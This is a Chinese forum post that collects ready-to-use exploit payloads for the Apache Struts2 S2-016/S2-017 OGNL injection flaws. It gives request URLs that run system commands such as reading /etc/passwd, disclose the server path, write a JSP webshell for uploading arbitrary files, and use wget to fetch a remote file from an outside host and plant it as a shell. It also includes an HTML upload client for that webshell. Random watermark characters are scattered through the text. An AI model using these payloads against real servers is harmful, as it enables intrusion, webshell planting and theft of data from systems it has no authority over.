Struts2 S2-016/S2-017漏洞执行代码

admin

大家都发了，，我就整理了一下。友情提示，自己小命比shell重要哦。。

* ?) E/ K% n  W5 |4 U2 V喜欢就点一下感谢吧^_^
0 A& t: c! }; k
带回显命令执行：

http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
$ c0 m4 Q5 b: ?8 m& e5 J2 V: W8 O

( t+ \- [3 P% Y! ^- x


& Z0 P. j5 U) j; c. C
3 ?$ W6 g' W/ p# P0 A- Q
: H: W6 J' Z* U2 a爆路径：

http://www.example.com/struts2-b ... 8%29.close%28%29%7D



& v( |8 k. S/ p7 X. V

写文件：

http://www.example.com/struts2-blank/example/X.action?redirect:${
0 u/ Y$ @, R' O8 Z
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
, [8 T0 P. F8 s: V! E6 P
* C2 @1 _* h9 }- `2 I%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
. C0 @  X/ w& w2 T* D4 g
- j; z, i# T% i$ N& nnew+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()

1 O( T: n, g. @( t}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e

- z; _7 H" y; |3 B

/ Q6 `; Q7 ]3 ?( H6 `" J写入的文件内容：
8 z' @9 D0 C$ K6 J, g' M
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
2 K9 ^3 A% d, E7 u% b3 _! ~
" q) R! V; V1 {( P  b5 ]其实就是一个jsp的小马，需要客户端配合                                                                                 

. V+ C7 F0 \' }, h4 M3 O% Y6 S函数f是文件名，t是内容

1 l* N& R+ v* ^4 t' Z+ w' ^2 D客户端：
2 i* b! U' j/ @1 J' `
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
8 p0 \9 m' J' o0 F
2 G% Y8 a5 O: H1 K& A" v* R/ x$ q<textarea name=t cols=120 rows=10 width=45>your code</textarea>

<center>
8 ]( N0 q+ T1 b3 O( R
1 m8 Z5 m: V3 A2 W# R, ^

! Y; ^% Y* E0 |! i& M& U<input type=submit value="提交">
: _: n: l* o* Q5 v1 s# q
</form>

4 o  {6 W0 ]" f/ a+ E* ^就在当前目录建立一个fjp.jsp
" n7 D* {& T9 v
shell：http://www.example.com/struts2-blank/example/fjp.jsp

3 Z- ~7 l) V" _( C  N

还有@园长的一个客户端：

! c# v( p& H. ?5 y$ I# q<html>
5 p8 k% ]3 z- q/ Y" i! x0 |3 ~% p
<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8">
' p+ l) Q7 ^% {- l1 s
<title>jsp-园长</title>

</head>

9 C9 @- W5 Q) N* w<style>

1 ^3 [& T# {# o% Z  G& {.main{width:980px;height:600px;margin:0 auto;}

.url{width:300px;}
% i9 Q. n2 u/ M* Q9 f
.fn{width:60px;}

9 F1 }8 A# ~) [$ Y% U/ {.content{width:80%;height:60%;}
! M0 j3 O7 }$ c/ |/ Q, ?8 j" g
* T6 `, o/ `. ^+ C# E</style>

<script>

  function upload(){

  u" Q0 \9 [0 p    var url = document.getElementById('url').value,
' d7 k, j4 z4 b$ ~% P
      content = document.getElementById('content').value,
! l0 D2 L6 p5 \( f+ D1 Q
  z! u4 c5 ]* w& [, M: p6 B; J      fileName = document.getElementById('fn').value,

3 z, w% q4 k& U% b/ E% N8 e      form = document.getElementById('fm');
. p# n. C, _! {7 S! F8 z
* a- W# S- M" x5 c9 p9 q3 j& e    if(url.length == 0){

      alert("Url not allowd empty!");
6 i  \7 Y* Z7 M3 ^
/ \$ N( E! [2 p* w- P; F7 T      return ;

    }
$ w" L3 {# l+ y5 j# ]! Z: H
; @: T, r. p& r% |' A    if(content.length == 0){

0 r: w4 O4 M# Y) U3 f6 P9 h      alert("Content not allowd empty!");

5 B1 M- ]0 X2 l& P% R5 K$ H& t2 M$ r      return ;
. M' w/ {9 U* a
    }
, S4 W' y5 D# E
; {0 O7 n* r8 t7 v; W3 f2 h    if(fileName.length == 0){
1 s# E, T3 B% T" q# Q
      alert("FileName not allowd empty!");

; p0 K* \: d: p9 J6 @& V      return ;
) v0 V- H; |1 N0 n% \
: G% z$ ?  L& k! |8 H5 k  n" c' n    }
- p: h1 O5 c3 X' ~0 X
    form.action = url;

0 t  j# W7 t0 v+ V, q4 _+ r& i6 j    form.submit();

  }

</script>
& {' s8 i6 h! J! m/ N
<body>

+ d. R: p% d0 N; |8 U- p<div class="main">

% X' G) G+ p$ t  I+ _9 A* U  <form id="fm" method="post">  
' m* n  N; ^0 J6 h% v1 m, R3 s
9 J3 p' M2 c5 i9 P! W- F( S, y- P    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
$ ]6 S: k5 A1 h' V; }) `$ D! R
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
. f7 g2 _8 r! L" r$ N
    <a href="javascript:upload();">Upload</a>
% a# C: C* m" m; w


    <textarea id="content" class="content" name="t" ></textarea>

+ X) Q& {: e9 S% k1 X  </form>

</div>

) Z' h" S& m7 `# c+ [</body>
, d" V1 u  _/ f$ y
</html>
$ L/ \- R7 a5 q% q3 r1 `

! Q3 b; v' N5 C/ m
4 Y. G2 c( C4 a( J- }0 Y/ c还有@X发的一个wget的getshell
9 s: C2 w  o3 ~* l, ?" J
?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}

2 }8 I2 t% Y* T* ^* Q1 K2 K)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
复制代码